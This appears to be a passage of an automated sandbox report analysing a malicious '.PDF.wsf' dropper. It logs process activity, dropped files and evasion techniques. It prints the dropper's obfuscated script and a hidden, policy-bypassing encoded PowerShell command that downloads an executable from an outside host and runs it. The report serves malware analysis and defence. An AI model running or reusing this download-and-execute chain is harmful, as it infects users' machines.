      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeUnpacked PE file: 5.2.oBuf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\wbfgshsUnpacked PE file: 10.2.wbfgshs.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: createobject("sh"& e &"ll.application")execute("pow = ""pow""& e &""rsh""& e &""ll""")sh.ShellExecute "cmD."& e &"x"& e, "/c "& pow &" -nop -w hidd"& e &"n -"& e &"p bypass -"& e &"nc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=", "", "op"& e &"n", 0'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvi
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7C13900BD pushad ; iretd 4_2_00007FF7C13900C1
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040237B push 000023C2h; retn 0023h5_2_0040238B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004025DC push ebp; ret 5_2_004025FC
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401284 pushad ; iretd 5_2_00401286
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A2643 push ebp; ret 5_2_006A2663
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A12EB pushad ; iretd 5_2_006A12ED
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A23E2 push 000023C2h; retn 0023h5_2_006A23F2
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0091141C pushad ; iretd 5_2_0091141E
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00917C54 push esp; ret 5_2_00917C55
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0091AD5B push edx; retf 5_2_0091AE31
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00912F41 push es; retf 5_2_00912F58
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0090D54C push eax; retf 5_2_0090D575
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00914671 push ebx; ret 5_2_00914674
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_0040237B push 000023C2h; retn 0023h10_2_0040238B
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_004025DC push ebp; ret 10_2_004025FC
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401284 pushad ; iretd 10_2_00401286
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007B2643 push ebp; ret 10_2_007B2663
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007B12EB pushad ; iretd 10_2_007B12ED
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007B23E2 push 000023C2h; retn 0023h10_2_007B23F2
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007F7B7C push esp; ret 10_2_007F7B7D
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007F2E69 push es; retf 10_2_007F2E80
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007F1344 pushad ; iretd 10_2_007F1346
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007F4599 push ebx; ret 10_2_007F459C
      Source: oBuf.exe.4.drStatic PE information: section name: .text entropy: 7.486630625699931
      Source: wbfgshs.9.drStatic PE information: section name: .text entropy: 7.486630625699931
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wbfgshsJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wbfgshsJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wbfgshs:Zone.Identifier read attributes | deleteJump to behavior
      Source: Possible double extension: pdf.wsfStatic PE information: 3312.PDF.wsf
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
